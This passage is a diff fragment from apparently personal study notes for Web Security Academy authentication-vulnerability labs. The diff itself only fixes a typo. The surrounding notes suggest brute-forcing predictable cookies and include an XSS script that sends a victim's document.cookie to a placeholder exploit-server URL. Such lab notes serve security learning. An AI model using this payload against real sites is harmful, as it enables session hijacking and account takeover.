astaniano/hat/platforms/webSecAcademy/server_side_topics/auth_vuln/docs/full.md

 - try to figure out how it is generated and whether it can be brute forced
 - if successful go to another url with that cookie e.g. /account

-### If not possible to crate your own account try to steal existing user cookies
+### If not possible to create your own account try to steal existing user cookies
 ```
 <script>document.location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/'+document.cookie</script>
 ```